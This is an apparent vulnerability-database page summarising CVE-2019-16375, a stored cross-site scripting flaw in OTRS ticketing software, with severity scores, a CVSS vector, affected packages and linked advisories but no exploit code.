CVE-2019-16375Cross-site Scripting in Otrs

CWE-79Cross-site Scripting5 documents4 sources
Severity
5.4MEDIUMNVD
OSV6.5
EPSS
0.6%
top 29.20%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
3
THE Openjpeg Project Openjpeg2Debian Otrs2Otrs
Timeline
PublishedMar 19
Latest updateMay 24

Description

An issue was discovered in Open Ticket Request System (OTRS) 7.0.x through 7.0.11, and Community Edition 5.0.x through 5.0.37 and 6.0.x through 6.0.22. An attacker who is logged in as an agent or customer user with appropriate permissions can create a carefully crafted string containing malicious JavaScript code as an article body. This malicious code is executed when an agent composes an answer to the original article.

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:NExploitability: 2.3 | Impact: 2.7

Affected Packages3 packages

debiandebian/otrs2< otrs2 6.0.23-1 (bullseye)
Ubuntuthe_openjpeg_project/openjpeg2< 2.1.2-1.1+deb9u6ubuntu0.1~esm1+1
NVDotrs/otrs5.0.05.0.37+2

🔴Vulnerability Details

3
GHSA
GHSA-c82j-j7c2-cx75: An issue was discovered in Open Ticket Request System (OTRS) 72022-05-24
OSV
openjpeg2 vulnerabilities2021-03-17
OSV
CVE-2019-16375: An issue was discovered in Open Ticket Request System (OTRS) 72020-03-19

📋Vendor Advisories

1
Debian
CVE-2019-16375: otrs2 - An issue was discovered in Open Ticket Request System (OTRS) 7.0.x through 7.0.1...2019
CVE-2019-16375 — Cross-site Scripting in Otrs | cvebase